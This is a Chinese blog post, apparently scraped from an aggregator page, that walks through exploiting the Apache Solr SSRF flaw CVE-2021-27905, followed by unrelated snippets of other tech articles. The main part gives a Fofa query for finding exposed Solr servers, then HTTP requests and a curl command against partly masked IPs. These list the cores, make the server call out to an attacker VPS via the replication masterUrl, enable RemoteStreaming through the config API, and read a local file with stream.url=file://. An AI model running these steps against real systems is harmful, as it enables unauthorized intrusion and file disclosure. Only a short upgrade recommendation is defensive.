不动明王_你懂不懂
不动明王_你懂不懂

Apache Solr SSRF漏洞

CVE-2021-27905 服务端请求伪造漏洞

ApacheSolr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器,使用Java语言开发,主要基于http和Apache Lucene实现的,该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。

漏洞危害

攻击者可以传递特定参数,使服务端发起请求,成功利用该漏洞可造成内网信息探测

Fofa搜索标题:(注意:互联网的非授权利用属于违法行为)

app='Solr'||app=''Apache-Solr'

一:

获取数据库名字

http://60.xxx.xxx.7:18090/solr/admin/cores?indexInfo=false&wt=json

Apache Solr SSRF漏洞_第1张图片

二 验证  flow要改成你自己的

GET /solr/flow/replication/?command=fetchindex&masterUrl=https://vps:7777 HTTP/1.1
Host: 60.xx.xx.7:18443
Cookie: JSESSIONID=0326C93CCD435FDC8DAECF89842C62A0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh-HK;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Apache Solr SSRF漏洞_第2张图片

三:得到了数据库名之后,我们可以通过修改数据库的配置来开启RemoteStreaming 获取数据

POST /solr/flow/config  HTTP/1.1
Host: 60.xx.xx.7:18090
User-Agent: Mozilla/5.0(Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=F35BFFC477925CCABFEAFE84CD293AE8
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 80

{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
Apache Solr SSRF漏洞_第3张图片 

或者 
curl -i -s -k -X 'POST' -H 'Content-Type: application/json' --data-binary '{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://60.xx.xx.7:18090/solr/flow/config

-i查看header头信息

-s 不输出统计信息

-k 使用能忽略证书不受信问题

-X 指定POST请求

-H 添加http请求的标头

-d 用于发送post请求的数据体

http://60.xx.xx.7:18090/solr/flow/debug/dump?param=ContentStreams

stream.url=file:///C:\Windows\System32\drivers\etc\hosts

Apache Solr SSRF漏洞_第4张图片

修复方案

建议受影响的用户升级到最新版本8.8.2

Apache Solr 8.8.2官方下载地址

https://solr.apache.org/downloads.html

注:修复漏洞前请备份资料,并进行充分测试。

你可能感兴趣的:(apache,solr,lucene,安全)

  • datasophon下dolphinscheduler执行脚本出错 无级程序员 大数据hive硬件架构hadoop
    执行hive脚本出错:错误消息:FAILED:RuntimeExceptionErrorloadinghooks(hive.exec.post.hooks):java.lang.ClassNotFoundException:org.apache.atlas.hive.hook.HiveHookatjava.net.URLClassLoader.findClass(URLClassLoader.ja
  • 卫龙辣条抽查不合格,中毒多年你还有救吗? 互联说
    近日,湖北省食品药品监督管理局发布食品安全监督抽检信息公告显示,在所抽检的11类食品643批次中,不合格样品21批次,其中包括卫龙、谢博士、小鹏食品、香铛铛、钟芹辉等,多款“辣条”产品被检出不合格瞬间让众多网友瞬间崩溃,惊呼:没想到你是这样的卫龙!而卫龙官方也在第一时间发声明称,卫龙产品完全合法合规。而抽查不合格的原因是,卫龙一直执行现行有效的地方标准,而相关国家标准尚在征求意见阶段。虽然这句高深
  • 网页源码保护助手 海洋网页在线加密:HTML 源码防复制篡改,密文安全如铜墙铁壁 小瑞软件库 开源软件软件构建电脑
    各位网页开发的大神们!今天给你们介绍个超厉害的东西——海洋网页在线加密,软件下载地址安装包它就是专门给咱网页开发者量身打造的代码保护神器啊!它的核心功能就是给HTML源码加密,能防止别人在咱没同意的情况下复制或者篡改代码内容。咱用户呢,直接把网页源代码复制到软件界面就行,然后它通过自动化加密流程,就能生成一堆谁也看不懂的密文。而且啊,它还支持把密文保存成TXT文件,或者直接嵌入到新网页里。这软件还
  • 车载监控录像机市场全景分析:趋势、竞争与未来机遇(2025-2030)
    车载监控录像机作为智能交通和车辆安全管理的重要组成部分,近年来随着技术进步和法规要求而快速发展。本文将从全球与中国市场现状、核心技术趋势、主要竞争格局以及未来发展机遇四个维度,全面分析这一蓬勃发展的行业。数据显示,2024年全球车载监控录像机市场规模已达数十亿美元,预计未来几年将保持稳健增长,其中中国市场表现尤为亮眼,成为全球增长的重要引擎。我们将深入探讨4K高清、AI智能分析、5G传输等创新技术
  • 出租车智能4G视频监控管理解决方案 索迪迈科技 车载监控录像机人工智能客流统计计算机视觉远程监控
    一、方案背景随着城市交通的不断发展,出租车作为城市公共交通的重要组成部分,其运营安全和服务质量备受关注。为了加强对出租车的管理,提高运营安全性,提升服务质量,同时保障乘客和司机的合法权益,建立一套高效的出租车视频监控管理系统具有重要意义。二、系统概述本出租车视频监控管理解决方案旨在通过在出租车上安装视频监控设备,实现对车辆内外情况的实时监控、录像存储、数据传输以及远程管理。系统主要由车载终端设备、
  • [密码学实战]密评相关题库解析 曼岛_ 成长之路密评题库
    [密码学实战]密评相关题库解析一、背景依据《密码法》第二十二条,关键信息基础设施(关基)运营者必须开展商用密码应用安全性评估,且需定期进行(不少于每年一次)。二、核心解析2.1测评标准框架(依据GM/T0115)考试围绕四大技术层面和三大管理维度展开:评估维度核心测评内容常见考点案例物理和环境安全电子门禁身份鉴别、视频记录存储完整性门禁系统使用SM3-HMAC判定合规性网络和通信安全VPN通道加密
  • 和来福玩真正的“躲猫猫”——沐沐说-20200719 艳子yz
    今天上午,爸爸妈妈带我坐家里的大白车出去玩。好久没坐过大白车,突然坐进去,我忍不住紧张地大哭起来,尤其是妈妈非得让我坐到我的专享座椅——儿童安全座椅上。我不想坐安全座椅,只想坐在妈妈的怀里,可妈妈非得让我坐在儿童安全座椅上。我正抗议呢,车子突然跑了起来,车窗外的树啊花花草草啊,都开始往后退。我盯着窗外看得入了迷,感觉还挺有意思的。到地方下车后,爸爸去买菜,妈妈推着我在路上溜达。今天阳光很好。妈妈把
  • L2TP实验 2301_81097039 网络
    一、实验拓扑二、实验内容手工部署IPSecVPN三、实验步骤1、配置接口IP和安全区域[PPPoEClient]firewallzonetrust[PPPoEClient-zone-trust]addintg1/0/0[NAS]firewallzoneuntrust[NAS-zone-untrust]addintg1/0/1[NAS]firewallzonetrust[NAS-zone-trust
  • 【可信数据空间】 flyair_China 安全
    分阶段设计可信数据空间(TrustedDataSpace,TDS)方案,覆盖数据处理、存储、加密及AI工作流全生命周期。一、预备阶段(Preliminary)目标:定义数据空间治理框架组织对齐设立TDS治理委员会(含安全官、数据科学家、合规专家),制定《可信数据共享宪章》:数据主权原则:所有权、使用权、存储权分离(GDPR/CCPA合规)最小授权机制:基于用途的访问控制(Purpose-based
  • 【手把手教学】NAS音乐远程播放从入门到精通:无需公网IP的内网穿透+手机端秒播 微学AI tcp/ip网络协议网络
    文章目录前言1.本教程使用环境:2.制作音频分享链接3.制作永久固定音频分享链接:前言当您需要跨越地理界限获取家中数字资产时,本文将提供一套创新性的解决方案。通过构建智能网络架构,您可在任何场景下——无论是移动办公、差旅途中还是短途外出——实现对本地音频数据的即时访问。本方案依托于分布式网络架构设计,通过部署安全通信协议,建立设备与家庭存储中心的加密传输链路。借助先进的远程访问技术,用户可将Syn
  • 【计算机毕业设计】基于SSM+Vue的游戏攻略网站系统【源码+lw+部署文档+讲解】
    目录1绪论1.1研究背景1.2目的和意义1.3论文结构安排2相关技术2.1SSM框架介绍2.2B/S结构介绍2.3Mysql数据库介绍3系统分析3.1系统可行性分析3.1.1技术可行性分析3.1.2经济可行性分析3.1.3运行可行性分析3.2系统性能分析3.2.1易用性指标3.2.2可扩展性指标3.2.3健壮性指标3.2.4安全性指标3.3系统流程分析3.3.1操作流程分析3.3.2登录流程分析3
  • 可信数据空间(Trusted Data Space)核心能力及行业赋能分析 小赖同学啊 testTechnologyPrecious算法
    可信数据空间(TrustedDataSpace)作为新一代数据共享基础设施,通过技术创新和治理框架的结合,为多行业提供安全、可控的数据流通能力。以下是其核心能力及行业赋能分析:一、可信数据空间的六大核心能力能力维度技术实现关键价值数据主权保障基于区块链的分布式身份(DID)属性基加密(ABE)数据所有者保持控制权,实现"数据可用不可见"安全共享计算联邦学习(FL)多方安全计算(MPC)可信执行环境
  • Java 进阶之路:探索更强大的编程世界 七七&556 面试学习路线阿里巴巴java开发语言
    在编程的浩瀚海洋中,Java如同一艘坚固的巨轮,引领着开发者们驶向创新与高效的彼岸。当我们掌握了Java的基础知识后,进阶之旅便悄然开启。一、面向对象的深入理解封装、继承与多态封装不仅仅是将数据隐藏起来,更是一种对代码的保护和组织方式。通过合理的封装,可以提高代码的可维护性和安全性。继承是代码复用的重要手段,但要避免过度继承带来的复杂性。理解继承的层次结构和正确使用继承,可以使代码更加清晰和易于扩
  • TypeScript 完全指南:实战与前沿技术深度解析 老三不说话、 前端typescriptjavascript前端
    一、企业级项目架构1.微前端架构的类型治理随着微前端架构在大型项目中普及,多团队协作开发的类型统一成为难题。想象一个电商平台,购物车、商品详情等模块由不同团队开发,若类型不一致,数据交互时极易出错。通过共享d.ts声明文件,定义全局类型,如User接口、Product类型,各子应用引用统一的类型定义,确保数据格式一致。此外,借助模块联邦技术,在子应用间安全传递类型化数据,例如://主应用定义全局类
  • 网络安全-动态风险评估工作原理、详细过程和架构及案例 hao_wujing web安全架构安全
    大家读完觉得有帮助记得关注和点赞!!!动态风险评估(DynamicRiskAssessment,DRA)是一种通过实时数据采集、AI分析和闭环反馈实现风险持续演算的主动防御技术。以下从工作原理、详细过程、架构设计及行业案例展开系统性解析:一、核心工作原理1.多源数据融合与实时感知异构数据采集:整合网络流量、端点行为、环境变量(如设备指纹、地理位置)、业务日志等多维数据,构建动态基线15。环境感知驱
  • 任推邦是正规平台吗是真的吗?任推邦怎么赚钱 任推邦官方账号
    任推邦是否是正规平台?其地推网推是否合法且可靠?作为拉新推广副业领域的龙头产品,任推邦已经广为人知。不过,对于初次接触这个行业的人来说,可能会有一些疑虑和困惑。本文将从行业逻辑和任推邦平台的具体情况出发,帮助大家了解任推邦是否真的安全可靠,以及为什么它能如此火爆和广受好评。一、行业逻辑分析:地推网推领域的拉新推广是否真实可靠?首先,我们先来分析地推网推行业的盈利逻辑,这与我们如何通过操作获得佣金密
  • 可信数据空间:概念、架构与应用实践 小赖同学啊 testTechnologyPrecious架构
    可信数据空间:概念、架构与应用实践一、可信数据空间的核心定义可信数据空间(TrustedDataSpace)是一种基于技术架构与制度设计的安全数据共享生态,通过构建“数据可用不可见、可控可追溯”的流通环境,解决数据要素市场化过程中的隐私保护、主权确认、流通合规等核心问题。其本质是通过密码学、区块链、智能合约等技术组合,实现数据在不同主体间的可信交互,同时保障数据所有者的权益与安全。二、核心技术要素
  • OCR 身份识别:让身份信息录入场景更高效安全 EkihzniY ocr安全
    在银行柜台开户、线上平台实名认证等场景中,身份信息录入是基础环节,OCR身份识别产品正成为提升效率与安全性的关键。传统人工录入身份证信息,不仅耗时久,还易因手误导致姓名、号码出错,影响业务办理进度。而OCR身份识别产品能快速扫描身份证,1秒内精准提取姓名、身份证号、地址等信息,自动填入业务系统,大幅缩短办理时间。在线上实名认证时,OCR结合人脸识别技术,先识别身份证信息,再比对人脸与证件照片,确保
  • ab命令压力测试---网站性能压力测试 凯凯恺恺恺恺凯凯 ab命令性能测试
    网站性能压力测试是服务器网站性能调优过程中必不可缺少的一环。只有让服务器处在高压情况下,才能真正体现出软件、硬件等各种设置不当所暴露出的问题。性能测试工具目前最常见的有以下几种:ab、http_load、webbench、siege。今天我们专门来介绍ab。ab是apache自带的压力测试工具。ab非常实用,它不仅可以对apache服务器进行网站访问压力测试,也可以对或其它类型的服务器进行压力测试
  • 移动网络http请求不到数据,wifi下可以 添码星空 Android开发HTTP网络连接
    今天客户反馈手机登录不上去,用wifi可以,但是切换到移动网络就不行。查找相关文档发现由于AndroidP(版本27以上)限制了明文流量的网络请求,非加密的流量请求都会被系统禁止掉。所以如果当前应用的请求是htttp请求,而非https,这样就会导系统禁止当前应用进行该请求。请看下面的官方说法:Android致力于保护用户们的设备和数据安全。我们保证数据安全的方法之一是保护所有进入或离开Andro
  • 一次XSS漏洞引发的用户信息泄露 —— 在线教育平台真实案例剖析与防御实践
    一、引子:一个“学习感言”输入框引发的安全事故在一次大型在线教育平台的开发中,笔者曾亲身经历过一起严重的安全事故。事故的起点很微不足道:一个允许用户提交“学习感言”的输入框。然而,由于缺乏安全意识和输入输出处理的规范,这个字段成为攻击者入侵的跳板,最终导致大量用户信息泄露、信任危机和平台业务受损。这个案例虽然已过去多年,但其中反映的安全盲点依然广泛存在于当前的互联网项目中,特别是在中小团队、快速上
  • 本周第一次约练 2cfbdfe28a51
    中原焦点团队中24初26刘霞2021.3.24约练57次,分享第125天:在今天约练的过程中,因为是在办公室进行,时常会有一些打扰,思路有时候会被打断,所以约练一定要找一个安静安全的地方,才能保证约练的顺利进行,才能有一个好的效果。当自己提到的内容不是来访者想要涉及到的,来访者能够及时指出,这样的一个信号,对于咨询师来说特别重要,能够让知道方向是否正确,及时调整。看到问题背后的资源,比如人之所以拖
  • 微电网系列之规划和运行控制 云纳星辰怀自在 微电网规划微电网运行控制
    个人主页:云纳星辰怀自在座右铭:“所谓坚持,就是觉得还有希望!”微电网规划设计与经济运行微电网规划需紧密结合运行策略,基于当地资源优化配置分布式发电单元并设计网络结构,以实现可靠、安全、经济、环保的目标;其运行则依赖能量管理系统,通过灵活调度分布式电源、储能和负荷来实现动态优化分配,最终达成经济高效、绿色优质的供电。微电网规划设计的核心目标与内容目标:实现可靠性、安全性、经济性和环境友好性的多目标
  • AWS Certified Cloud Practitioner 认证考试 测试题与解析 DEMI0815 AWSaws大数据云计算
    AWSCertifiedCloudPractitioner认证考试测试题与解析SecurityandCompliance(安全性与合规性)TechnologyCloudConcepts(云概念)BillingandPricing(计费与定价)SecurityandCompliance(安全性与合规性)1:Whichofthefollowingisarecommendedwaytoprovidepr
  • 突发:量化北恒私募实盘大赛周一丰上当受骗真相剖析!不能提现出金曝光! 易星辰分享普法
    量化北恒私募实盘大赛周一丰投票项目安全吗?量化北恒私募实盘大赛周一丰积分投票已经亏损被骗了怎么办?警惕!量化北恒私募实盘大赛周一丰十选五项目合法吗——杀猪盘骗局!被骗提不了款!提不了现!出不来金!不要上当!自古有句话讲得好“人善被欺、马善被骑”,现如今也是被骗子利用到了极致,人善就真该被欺骗吗?狡猾的骗子们就利用到了这点,利用同情心、爱心去进行诈骗,宣传公益捐款、爱心慈善打比赛来骗取资金!正常的投
  • 10.jobManager初始化流程
    JobManager初始化流程1.找到入口类StandaloneSessionClusterEntrypoint该类位于Flink源码的以下路径中:flink-runtime/src/main/java/org/apache/flink/runtime/entrypoint/StandaloneSessionClusterEntrypoint.java2.查看main方法/**Entrypoint
  • c#泛型集合(ArrayList和List、Dictionary的对比)
    一、List集合1.基本概念泛型集合:只能存储指定类型的数据,类型安全。动态扩容:无需指定初始大小,自动调整容量。性能优势:避免装箱拆箱(相比ArrayList)。2.创建与初始化//空列表Listlist=newList();​//带初始值的列表Listlist4=newList{"aaa","ccc","bbb"};3.常用属性与方法操作代码示例说明添加元素list.Add(100);在末尾添
  • C# 代码(`Hashtable` 和 `SortedList`) 张謹礧 c#哈希算法开发语言
    一、Hashtable(哈希表)1.基本概念非泛型集合:存储键值对(object类型),通过哈希算法实现快速查找。线程安全:默认非线程安全,可通过Hashtable.Synchronized创建线程安全版本。键的唯一性:键必须唯一,且不可为null(值可为null)。2.创建与初始化//创建空的HashtableHashtablehashtable=newHashtable();​//创建并初始化
  • Python 单例模式几种实现方式 @MMiL PyBuildpythonmatplotlibnumpypandas
    文章目录1基础实现方式1.1模块导入法(推荐)1.2重写`__new__`方法2进阶实现方式2.1元类(Metaclass)控制2.2线程安全单例2.3单例装饰器3关键问题分析4实践建议各位老板好,单例模式确保一个类只有一个实例,并提供全局访问点。适用于日志记录、配置管理、数据库连接池等场景。以下是Python单例模式的5种实现方式:1基础实现方式1.1模块导入法(推荐)Python模块天然支持单
  • 车载电子电器架构 --- MCU信息安全相关措施 汽车电子实验室 电子电器架构——刷写方案车载电子电气架构单片机网络架构安全电气电子架构开发的应对策略ECU刷写与busoff原则电子电气架构
    我是穿拖鞋的汉子,魔都中坚持长期主义的汽车电子工程师。老规矩,分享一段喜欢的文字,避免自己成为高知识低文化的工程师:周末洗了一个澡,换了一身衣服,出了门却不知道去哪儿,不知道去找谁,漫无目的走着,大概这就是成年人最深的孤独吧!旧人不知我近况,新人不知我过往,近况不该旧人知,过往不与新人讲。纵你阅人何其多,再无一人恰似我。时间不知不觉中,来到新的一年。2025开始新的忙碌。成年人的我也不知道去哪里渡
  • linux系统服务器下jsp传参数乱码 3213213333332132 javajsplinuxwindowsxml
    在一次解决乱码问题中, 发现jsp在windows下用js原生的方法进行编码没有问题,但是到了linux下就有问题, escape,encodeURI,encodeURIComponent等都解决不了问题 但是我想了下既然原生的方法不行,我用el标签的方式对中文参数进行加密解密总该可以吧。于是用了java的java.net.URLDecoder,结果还是乱码,最后在绝望之际,用了下面的方法解决了
  • Spring 注解区别以及应用 BlueSkator spring
    1. @Autowired @Autowired是根据类型进行自动装配的。如果当Spring上下文中存在不止一个UserDao类型的bean,或者不存在UserDao类型的bean,会抛出 BeanCreationException异常,这时可以通过在该属性上再加一个@Qualifier注解来声明唯一的id解决问题。   2. @Qualifier 当spring中存在至少一个匹
  • printf和sprintf的应用 dcj3sjt126com PHPsprintfprintf
    <?php printf('b: %b <br>c: %c <br>d: %d <bf>f: %f', 80,80, 80, 80); echo '<br />'; printf('%0.2f <br>%+d <br>%0.2f <br>', 8, 8, 1235.456); printf('th
  • config.getInitParameter 171815164 parameter
    web.xml <servlet> <servlet-name>servlet1</servlet-name> <jsp-file>/index.jsp</jsp-file> <init-param> <param-name>str</param-name>
  • Ant标签详解--基础操作 g21121 ant
            Ant的一些核心概念:         build.xml:构建文件是以XML 文件来描述的,默认构建文件名为build.xml。        project:每个构建文
  • [简单]代码片段_数据合并 53873039oycg 代码
            合并规则:删除家长phone为空的记录,若一个家长对应多个孩子,保留一条家长记录,家长id修改为phone,对应关系也要修改。         代码如下:        
  • java 通信技术 云端月影 Java 远程通信技术
    在分布式服务框架中,一个最基础的问题就是远程服务是怎么通讯的,在Java领域中有很多可实现远程通讯的技术,例如:RMI、MINA、ESB、Burlap、Hessian、SOAP、EJB和JMS等,这些名词之间到底是些什么关系呢,它们背后到底是基于什么原理实现的呢,了解这些是实现分布式服务框架的基础知识,而如果在性能上有高的要求的话,那深入了解这些技术背后的机制就是必须的了,在这篇blog中我们将来
  • string与StringBuilder 性能差距到底有多大 aijuans
              之前也看过一些对string与StringBuilder的性能分析,总感觉这个应该对整体性能不会产生多大的影响,所以就一直没有关注这块!         由于学程序初期最先接触的string拼接,所以就一直没改变过自己的习惯!        
  • 今天碰到 java.util.ConcurrentModificationException 异常 antonyup_2006 java多线程工作IBM
    今天改bug,其中有个实现是要对map进行循环,然后有删除操作,代码如下: Iterator<ListItem> iter = ItemMap.keySet.iterator(); while(iter.hasNext()){ ListItem it = iter.next(); //...一些逻辑操作 ItemMap.remove(it); } 结果运行报Con
  • PL/SQL的类型和JDBC操作数据库 百合不是茶 PL/SQL表标量类型游标PL/SQL记录
    PL/SQL的标量类型:    字符,数字,时间,布尔,%type五中类型的 --标量:数据库中预定义类型的变量 --定义一个变长字符串 v_ename varchar2(10); --定义一个小数,范围 -9999.99~9999.99 v_sal number(6,2); --定义一个小数并给一个初始值为5.4 :=是pl/sql的赋值号
  • Mockito:一个强大的用于 Java 开发的模拟测试框架实例 bijian1013 mockito单元测试
    Mockito框架:         Mockito是一个基于MIT协议的开源java测试框架。         Mockito区别于其他模拟框架的地方主要是允许开发者在没有建立“预期”时验证被测系统的行为。对于mock对象的一个评价是测试系统的测
  • 精通Oracle10编程SQL(10)处理例外 bijian1013 oracle数据库plsql
    /* *处理例外 */ --例外简介 --处理例外-传递例外 declare v_ename emp.ename%TYPE; begin SELECT ename INTO v_ename FROM emp where empno=&no; dbms_output.put_line('雇员名:'||v_ename); exceptio
  • 【Java】Java执行远程机器上Linux命令 bit1129 linux命令
    Java使用ethz通过ssh2执行远程机器Linux上命令,   封装定义Linux机器的环境信息   package com.tom; import java.io.File; public class Env { private String hostaddr; //Linux机器的IP地址 private Integer po
  • java通信之Socket通信基础 白糖_ javasocket网络协议
    正处于网络环境下的两个程序,它们之间通过一个交互的连接来实现数据通信。每一个连接的通信端叫做一个Socket。一个完整的Socket通信程序应该包含以下几个步骤: ①创建Socket; ②打开连接到Socket的输入输出流; ④按照一定的协议对Socket进行读写操作; ④关闭Socket。   Socket通信分两部分:服务器端和客户端。服务器端必须优先启动,然后等待soc
  • angular.bind boyitech AngularJSangular.bindAngularJS APIbind
    angular.bind 描述:         上下文,函数以及参数动态绑定,返回值为绑定之后的函数. 其中args是可选的动态参数,self在fn中使用this调用。 使用方法:          angular.bind(se
  • java-13个坏人和13个好人站成一圈,数到7就从圈里面踢出一个来,要求把所有坏人都给踢出来,所有好人都留在圈里。请找出初始时坏人站的位置。 bylijinnan java
    import java.util.ArrayList; import java.util.List; public class KickOutBadGuys { /** * 题目:13个坏人和13个好人站成一圈,数到7就从圈里面踢出一个来,要求把所有坏人都给踢出来,所有好人都留在圈里。请找出初始时坏人站的位置。 * Maybe you can find out
  • Redis.conf配置文件及相关项说明(自查备用) Kai_Ge redis
       Redis.conf配置文件及相关项说明 # Redis configuration file example # Note on units: when memory size is needed, it is possible to specifiy # it in the usual form of 1k 5GB 4M and so forth: #
  • [强人工智能]实现大规模拓扑分析是实现强人工智能的前奏 comsci 人工智能
         真不好意思,各位朋友...博客再次更新...      节点数量太少,网络的分析和处理能力肯定不足,在面对机器人控制的需求方面,显得力不从心....      但是,节点数太多,对拓扑数据处理的要求又很高,设计目标也很高,实现起来难度颇大...
  • 记录一些常用的函数 dai_lm java
    public static String convertInputStreamToString(InputStream is) { StringBuilder result = new StringBuilder(); if (is != null) try { InputStreamReader inputReader = new InputStreamRead
  • Hadoop中小规模集群的并行计算缺陷 datamachine mapreducehadoop并行计算
    注:写这篇文章的初衷是因为Hadoop炒得有点太热,很多用户现有数据规模并不适用于Hadoop,但迫于扩容压力和去IOE(Hadoop的廉价扩展的确非常有吸引力)而尝试。尝试永远是件正确的事儿,但有时候不用太突进,可以调优或调需求,发挥现有系统的最大效用为上策。 -----------------------------------------------------------------
  • 小学4年级英语单词背诵第二课 dcj3sjt126com englishword
    egg  蛋 twenty 二十 any 任何 well 健康的,好   twelve 十二 farm 农场 every 每一个 back 向后,回   fast 快速的 whose 谁的 much 许多 flower 花   watch 手表 very 非常,很 sport 运动 Chinese 中国的  
  • 自己实践了github的webhooks, linux上面的权限需要注意 dcj3sjt126com githubwebhook
    环境, 阿里云服务器   1. 本地创建项目, push到github服务器上面   2. 生成www用户的密钥 sudo -u www ssh-keygen -t rsa -C "[email protected]"     3. 将密钥添加到github帐号的SSH_KEYS里面   3. 用www用户执行克隆, 源使
  • Java冒泡排序 蕃薯耀 冒泡排序Java冒泡排序Java排序
    冒泡排序 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 2015年6月23日 10:40:14 星期二 http://fanshuyao.iteye.com/
  • Excle读取数据转换为实体List【基于apache-poi】 hanqunfeng apache
    1.依赖apache-poi   2.支持xls和xlsx   3.支持按属性名称绑定数据值   4.支持从指定行、列开始读取   5.支持同时读取多个sheet   6.具体使用方式参见org.cpframework.utils.excelreader.CP_ExcelReaderUtilTest.java 比如: Str
  • 3个处于草稿阶段的Javascript API介绍 jackyrong JavaScript
    原文: http://www.sitepoint.com/3-new-javascript-apis-may-want-follow/?utm_source=html5weekly&utm_medium=email   本文中,介绍3个仍然处于草稿阶段,但应该值得关注的Javascript API. 1) Web Alarm API   &
  • 6个创建Web应用程序的高效PHP框架 lampcy Web框架PHP
    以下是创建Web应用程序的PHP框架,有coder bay网站整理推荐: 1. CakePHP CakePHP是一个PHP快速开发框架,它提供了一个用于开发、维护和部署应用程序的可扩展体系。CakePHP使用了众所周知的设计模式,如MVC和ORM,降低了开发成本,并减少了开发人员写代码的工作量。 2. CodeIgniter CodeIgniter是一个非常小且功能强大的PHP框架,适合需
  • 评"救市后中国股市新乱象泛起"谣言 nannan408
    首先来看百度百家一位易姓作者的新闻: 三个多星期来股市持续暴跌,跌得投资者及上市公司都处于极度的恐慌和焦虑中,都要寻找自保及规避风险的方式。面对股市之危机,政府突然进入市场救市,希望以此来重建市场信心,以此来扭转股市持续暴跌的预期。而政府进入市场后,由于市场运作方式发生了巨大变化,投资者及上市公司为了自保及为了应对这种变化,中国股市新的乱象也自然产生。 首先,中国股市这两天
  • 页面全屏遮罩的实现 方式 Rainbow702 htmlcss遮罩mask
    之前做了一个页面,在点击了某个按钮之后,要求页面出现一个全屏遮罩,一开始使用了position:absolute来实现的。当时因为画面大小是固定的,不可以resize的,所以,没有发现问题。 最近用了同样的做法做了一个遮罩,但是画面是可以进行resize的,所以就发现了一个问题,当画面被reisze到浏览器出现了滚动条的时候,就发现,用absolute 的做法是有问题的。后来改成fixed定位就
  • 关于angularjs的点滴 tntxia AngularJS
      angular是一个新兴的JS框架,和以往的框架不同的事,Angularjs更注重于js的建模,管理,同时也提供大量的组件帮助用户组建商业化程序,是一种值得研究的JS框架。   Angularjs使我们可以使用MVC的模式来写JS。Angularjs现在由谷歌来维护。   这里我们来简单的探讨一下它的应用。   首先使用Angularjs我
  • Nutz--->>反复新建ioc容器的后果 xiaoxiao1992428 DAOmvcIOCnutz
    问题: public class DaoZ {     public static Dao dao() { // 每当需要使用dao的时候就取一次     Ioc ioc = new NutIoc(new JsonLoader("dao.js"));     return ioc.get(
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他